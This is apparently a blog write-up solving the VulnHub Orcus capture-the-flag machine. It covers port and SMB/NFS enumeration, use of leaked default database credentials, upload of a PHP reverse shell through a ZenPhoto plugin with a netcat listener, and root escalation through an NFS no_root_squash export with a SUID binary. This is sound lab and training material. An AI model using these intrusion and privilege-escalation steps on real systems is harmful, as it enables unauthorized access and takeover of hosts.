VulnHub Orcus Solution

For background information on this series of CTFs you may want to read this page. Or if your just after my solution please keep reading.



This is the last of 3 incrementally difficult CTF’s created for HackFest 2016 by @ViperBlackSkull and released on the VulnHub platform.


Difficulty - Hard

My Solution

As always start with an NMAP Scan to see what ports are open.

root@Kali:~/orcus# nmap -p- -Pn -A -v -oX orcus_nmap.xml
Starting Nmap 7.40 ( ) at 2017-03-23 13:14 GMT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:14
Completed Parallel DNS resolution of 1 host. at 13:14, 0.00s elapsed
Initiating SYN Stealth Scan at 13:14
Scanning [65535 ports]
Discovered open port 993/tcp on
Discovered open port 53/tcp on
Discovered open port 110/tcp on
Discovered open port 445/tcp on
Discovered open port 111/tcp on
Discovered open port 443/tcp on
Discovered open port 995/tcp on
Discovered open port 139/tcp on
Discovered open port 143/tcp on
Discovered open port 80/tcp on
Discovered open port 22/tcp on
Discovered open port 51994/tcp on
Discovered open port 44123/tcp on
Discovered open port 43229/tcp on
Discovered open port 54377/tcp on
Discovered open port 2049/tcp on

Looks very similar to the last two with a couple of extra services running.

Port 80 is showing the standard splash screen.

I started Nikto in the background and started looking at the service enumeration results.

Everything looked pretty standard except port 443 wasn’t HTTP or HTTPS it was instead another ssh port.

443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)

2 ports listening or incoming ssh connections seemed a bit odd. There were no banners running on either port. So nothing to really help there.

Nikto was still running so I decided to look at some more service.

NMAP Scripts show that samba is running and accepting guest logons

Host script results:
|_clock-skew: mean: 55m03s, deviation: 0s, median: 55m03s
| nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ORCUS<00>            Flags: <unique><active>
|   ORCUS<03>            Flags: <unique><active>
|   ORCUS<20>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: \x00
|   NetBIOS computer name: ORCUS\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-23T10:22:12-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

enum4linux is a tool on Kali for enumerating SMB services. There are no open shares or vulnerabilities on this version but there is a list of users and groups, The most interesting element is:

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

Kippo is a medium interaction SSH honeypot and I have spent a lot of time using this tool :) This also explains the two SSH Ports.

NFS is also open so lets see if there are any shares on here. Nmap includes some useful scripts for enumerating open NFS Shares

root@Kali:~/orcus# nmap --script nfs-*
Starting Nmap 7.40 ( ) at 2017-03-23 14:15 GMT
Nmap scan report for
Host is up (0.11s latency).
Not shown: 988 closed ports
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
| nfs-ls: Volume /tmp
|   access: Read Lookup Modify Extend Delete NoExecute
| ??????????  ?    ?    ?     ?                    .
| rwxr-xr-x   0    0    4096  2016-10-31T03:05:46  ..
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .ICE-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .Test-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .X11-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .XIM-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .font-unix
| rwx------   0    0    4096  2017-03-23T08:43:01  systemd-private-337e8f7600944b7db31c3b6535178cce-dovecot.service-fW3Ids
| rwx------   0    0    4096  2017-03-23T08:42:58  systemd-private-337e8f7600944b7db31c3b6535178cce-systemd-timesyncd.service-Ql58io
| rwx------   0    0    4096  2017-03-23T08:42:59  vmware-root
| nfs-showmount: 
|_  /tmp *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /tmp        7608792.0  3621728.0  3577516.0  51%   8.0T         32000

Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds

/tmp from the target is exported as a share that we can reach, Looks like we can read and write but not execute. I test this by mounting the share on my local host and creating a file. (You may need to apt-get install nfs-common)

root@Kali:~/orcus# mkdir nfsmount
root@Kali:~/orcus# mount -t nfs nfsmount
root@Kali:~/orcus# cd nfsmount
root@Kali:~/orcus/nfsmount# ls
systemd-private-b912b13f08a547cca382811da93446e3-dovecot.service-3Oo1yR            vmware-root
root@Kali:~/orcus/nfsmount# echo 'test' > test.txt
root@Kali:~/orcus/nfsmount# ls
systemd-private-b912b13f08a547cca382811da93446e3-dovecot.service-3Oo1yR            test.txt
systemd-private-b912b13f08a547cca382811da93446e3-systemd-timesyncd.service-QJasTL  vmware-root

Doesn’t seem to be much more we can gather from this so I head back to my nikto results which have just finished.

There is a lot of information in here. The robots.txt file had 30 entries which caused some noise. I started going through all the results with some interesting finds.

  • Multiple index files found: /index.html, /index.php

Index.html is our splash screen, Index.php shows an error message about a database being offline.

This also identifies the software in use as Exponent CMS, which we could also gather from the other results in nikto.

* Entry '' in robots.txt returned a non-forbidden or redirect HTTP code (200)

This was also repeated for other files like and By looking at these files we can determine the version number is most likely 2.0.

Searchsploit returned a few potential vulnerabilities that could be of use but the files where either missing from the install or as it was not configured for DB access there was no valid SQL injection.

* /phpmyadmin/: phpMyAdmin directory found

There is an installation of phpmyadmin but no version numbers listed anywhere. I tried a few known exploits but nothing worked so I started to expand my search. I wondered what else might be installed so I threw dirbuster at the web server.

My first scan with dirbuster is always a fast scan with NO recursion. Some web apps have deep directories and they can take a long time to scan. If I want to scan recursively I do it per folder by settings the Dir to start with field.

Much the same as Nikto found but we also found a backup folder that says it contains ssh-creds.bak

Trying to read the creds file results in a 403 forbidden response, but the SimplePHPQuiz-Backup.tar.gz file is accessible

After saving and extracting the archive I start navigating the source code. I find a db_conn.php file that looks like it still contains the default configuration.

//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){
    echo "Could not connect to MySql. Please try again";


I try these creds in the logon form for  phpmyadmin and success im in. This account has full privileges the same as the mysql root account.

I try to read and write files out to get more information or create a php shell but the MySQL Server has been started with increased security preventing this.

Lets see what else we have.

Most of the tables are empty.

The zencart database is populated and has admin creds configured. There are vulnerabilities if I can identify the version. To do this I need to figure out the install path. It’s not in any of the tables and dirbuster didn’t find it either.

I try the obvious entries like /zencart/ /cart /store with no luck . I throw other dictionaries at dirbuster again without success.

Next I look to see if any of the other tables have directories, I have the source for the phpquizz maybe there is a vulnerability in there somewhere i can find.

I wasn’t far of as I’m checking the tables I find zenphoto 1.4.10 is present on the server but not installed yet.

As luck would have it there is a known vulnerability with this version all we need to do is install it first.

Configure the SQL DB Options with our credentials dbuser dbpassword, click save and then Go :) From here just follow the setup steps to get you admin account logged in.

Grab the details of the exploit from searchsploit and test them out

root@kali:~/Desktop/setec-vpn# searchsploit zenphoto 1.4.10
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                                |  Path
                                                                                                                              | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
ZenPhoto 1.4.10 - Local File Inclusion                                                                                        | php/webapps/38841.txt
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
root@kali:~/Desktop/setec-vpn# searchsploit -p 38841
Exploit: ZenPhoto 1.4.10 - Local File Inclusion
   Path: /usr/share/exploitdb/platforms/php/webapps/38841.txt

Copied EDB-ID 38841's path to the clipboard.

It’;s a local file include that should be easy to trigger but it just wont work :(

I start thinking of other ways to get files uploaded or php code running on the server. I spot tabs for themes and plugins. These are ideal places to upload and inject php code that I can use to get command line access.

Themes are not editable from the web UI so that’s out , at first glance its the same for plugins, they can not be edited or uploaded from the Web UI but there are several that are installed but not enabled. . . Including a file uploader.

Enable this and head to the upload page and we can now push up any files we like. I start with my favourite php reverse shell from pentest monkey.

Any files we upload are placed in to and we can browse this folder in the browser and, after starting a netcat listener, open our shell.php page.

root@kali:~/Desktop/setec-vpn# netcat -l -vv -p 1234
listening on [any] 1234 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 39818
Linux Orcus 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:05 UTC 2016 i686 athlon i686 GNU/Linux
 16:03:05 up 45 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Now I have a shell its on to my usual hands on  routine

  1. Spawn a tty shell
  2. file listing to web root
  3. Search for flags
  4. upload linux enumeration script.
www-data@Orcus:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
www-data@Orcus:/$ cat /var/www/flag.txt
cat /var/www/flag.txt
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Orcus:/$ find / > /var/www/html/dirs.txt
find / > /var/www/html/dirs.txt
www-data@Orcus:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
www-data@Orcus:/$ cat /var/www/flag.txt
cat /var/www/flag.txt

The benefit of writing dirs to the html dir is that I can download these files with a browser. I could also move these all to /tmp/ where I know I can write and read files using NFS.

After running the Linux Enumeration script there are some interesting elements, I confirmed that kippo SSH Honeypot is running in the background and the real SSH is running on 443.

I check the kippo logs incase our users accidentally logged in to the honeypot instead of the host device. a Mistake I have never made :P Honestly.

There are no logs in the log or tty dir so I check the config incase they are being written anywhere else. Sadly not but I did find an extra flag for my troubles.

# Port to listen for incoming SSH connections.
# user:1:TH!SP4SSW0RDIS4Fl4G!

Back to the search for root and I couldn’t find much that helped me. I tried to read the ssh-creds.bak file that had evaded me earlier but it was write only.

total 224K
d-wx--x--x 15 www-data www-data 4.0K Mar 25 07:15 ..
drwxr-xr-x  2 www-data www-data 4.0K Nov  1 21:33 .
--w-------  1 www-data www-data   12 Nov  1 21:33 ssh-creds.bak
-rw-r--r--  1 www-data www-data 211K Oct 31 20:29 SimplePHPQuiz-Backupz.tar.gz

In a moment of desperation I started throwing random priv esc exploits at the box with no luck.

After a lot of time wandering around the box I started looking for misconfigured services that may have a way in as root. (should have started here really)!

From the list of processes running as root, Samba, NFS and Dovecot look like prime targets.

Starting with samba I had already enumerated a lot of this earlier, so I started checking the smb.conf file for anything out of place.

Everything looked pretty standard.

Next was NFS. Looking in /etc/exports everything seemed to look OK at first glance but I didn’t know a lot about NFS other than setting up some basic exports. So I took to google. The following posts gave me a lot of information to get started on exploiting NFS

The first post I started reading was nfs hardlinks from pentest monkey using this technique I could create a hard symlink from a file to the tmp dir (the export dir) and then view the file on my host from the mounted share.

I figured a good test would be the ssh-creds.bak file.

On the target run:

www-data@Orcus:/etc/kippo$ cd /tmp 
cd /tmp
www-data@Orcus:/tmp$ ln /var/www/html/backups/ssh-creds.bak ssh-creds.bak
ln /var/www/html/backups/ssh-creds.bak ssh-creds.bak

Then from my host I can just browse in to the mounted folder and view the files

root@kali:~/VulnHub/Orcus# mkdir nfsmount
root@kali:~/VulnHub/Orcus# mount -t nfs nfsmount
root@kali:~/VulnHub/Orcus/nfsmount# ls
ssh-creds.bak                                                            systemd-private-337e8f7600944b7db31c3b6535178cce-systemd-timesyncd.service-Ql58io  vmware-root
systemd-private-337e8f7600944b7db31c3b6535178cce-dovecot.service-fW3Ids  test
root@kali:~/VulnHub/Orcus/nfsmount# cat ssh-creds.bak

These are the default creds for kippo so I think I’m being trapped here but I try them on the real ssh port anyway with no success.

At the end of the blog post they suggest that if root_squash is enabled then I should be able to access more privileged files like shadow.

I tried several times without success so I went back to reading up on NFS and exploiting no_root_squash.

The blog posts focused on copying a binary that i could set to run with root privileges regardless of the user that launched the application.

The examples used vi to edit the shadow and passwd files. I couldn’t get them to function. I tried the same technique for the sh file to get a root shell again with no joy. The shell would launch but with my normal permissions.

After trying the examples and failing i moved on to the next technique. This involved compiling your own c code that would start a bash shell. I used the example C code from highoncoffee 

int main(void){
       setresuid(0, 0, 0);

On my host create the file.

One the target compile the binary

www-data@Orcus:/tmp$ gcc -o suidbash suidbash.c
gcc -o suidbash suidbash.c
suidbash.c: In function 'main':
suidbash.c:2:8: warning: implicit declaration of function 'setresuid' [-Wimplicit-function-declaration]
        setresuid(0, 0, 0);
suidbash.c:3:8: warning: implicit declaration of function 'system' [-Wimplicit-function-declaration]

On my host set the suid bit

root@kali:~/VulnHub/Orcus/nfsmount# chown root:root suidbash
root@kali:~/VulnHub/Orcus/nfsmount# chmod u+s suidbash

Back on the target execute the file

www-data@Orcus:/tmp$ ./suidbash
root@Orcus:/tmp# id
uid=0(root) gid=33(www-data) groups=33(www-data)

And enjoy the root shell goodness that ensues :) It’s important to chown before chmod as chown will remove the suid bit.

Now for that root flag to finish it off.

root@Orcus:/tmp# find / -name flag.txt
find / -name flag.txt
root@Orcus:/tmp# cat /root/flag.txt
cat /root/flag.txt

And that completes the series. I had a lot of fun working my way through these and learnt a lot along the way. A big thanks to @ViperBlackSkull for creating the series and of course to @VulnHub for hosting them all.

As usual Questions, Queries, Comments below.